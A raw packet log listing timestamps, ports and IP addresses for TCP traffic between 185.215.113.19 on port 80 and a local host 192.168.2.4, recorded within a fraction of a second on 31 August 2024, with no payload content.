Aug 31, 2024 22:41:57.518603086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518614054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518624067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518634081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518645048 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518656015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518666029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518676996 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518687010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518697977 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518708944 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518718958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518728971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518738985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519473076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519486904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519498110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519509077 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519520044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519530058 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519541025 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519551039 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519562006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519572973 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519583941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519593954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519604921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519615889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519625902 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519637108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519646883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.519658089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.610192060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610301971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610320091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610342979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610363960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610382080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610402107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610429049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610452890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610521078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610538960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610627890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610627890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610728979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610797882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610856056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610887051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610901117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610924959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.610960960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611062050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611084938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611109018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611135960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611165047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611187935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611438990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611464024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611488104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611517906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611536026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611567020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611597061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611613989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611640930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611773968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611795902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611900091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611969948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.611991882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612016916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612039089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612129927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612153053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612184048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612360001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612390995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612415075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612438917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612459898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612498045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612519026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612545013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612570047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612596035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612695932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612719059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612742901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612816095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612831116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612855911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612884998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612901926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.612926960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613020897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613048077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613132000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613157988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613209963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613313913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613313913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613339901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613356113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613420010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613420010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613420010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613420010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613436937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613466978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613483906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613507986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613521099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613540888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613559008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613580942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613605022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613615036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613640070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613665104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613677025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613702059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613718987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613735914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613909960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613929987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613951921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.613965034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614130020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614145994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614224911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614224911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614238977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614263058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614284039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614291906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614312887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614336967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614351988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614372015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614382982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614409924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614423990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614445925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614459038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614480019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614502907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614514112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614535093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614548922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614571095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614622116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614644051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614665031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614682913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614741087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614751101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614773035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614794970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614809990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614830971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.614991903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615005970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615025043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615046024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615066051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615087032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615108967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615124941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615142107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615154982 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615159035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615175009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615181923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615197897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615216970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615298033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615309954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615329027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615349054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615358114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615365028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615381002 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615411043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615415096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615428925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615451097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615463018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615498066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615518093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615521908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615535975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615551949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615556955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615605116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615627050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615639925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615643978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615658045 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615665913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615673065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615673065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615696907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615715981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615854979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615855932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615880013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615890980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615902901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615904093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615915060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615926027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615943909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615947008 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.615955114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615977049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.615994930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616018057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616028070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616048098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616069078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616084099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616103888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616179943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616185904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616199970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616219044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616221905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616239071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616288900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616292953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616303921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616324902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616338015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616355896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616385937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616390944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616398096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616409063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616420031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616446018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616489887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616501093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616522074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616528034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616544962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616565943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616575003 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616584063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616600990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616695881 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616740942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616743088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616751909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616774082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616789103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616791964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616806030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616827011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616848946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616858959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616875887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616899014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616908073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616919041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616935968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.616938114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.616955996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617027044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617042065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617064953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617088079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617120028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617134094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617151976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617182970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617222071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617242098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617245913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617254019 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617259026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617285013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617310047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617326975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617326975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617338896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617356062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617377043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617397070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617413998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617430925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617449045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617451906 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617482901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617575884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617588997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617609024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617609978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617621899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617630959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617633104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617643118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617657900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617660999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617669106 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617680073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617688894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617697954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617721081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617738962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617755890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617768049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617778063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617779970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617791891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617863894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617883921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617887974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617893934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617916107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617923975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617932081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.617957115 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.617960930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618026972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618026972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618036985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618067026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618083954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618098021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.618105888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.618154049 CEST	49732	80	192.168.2.4	185.215.113.19
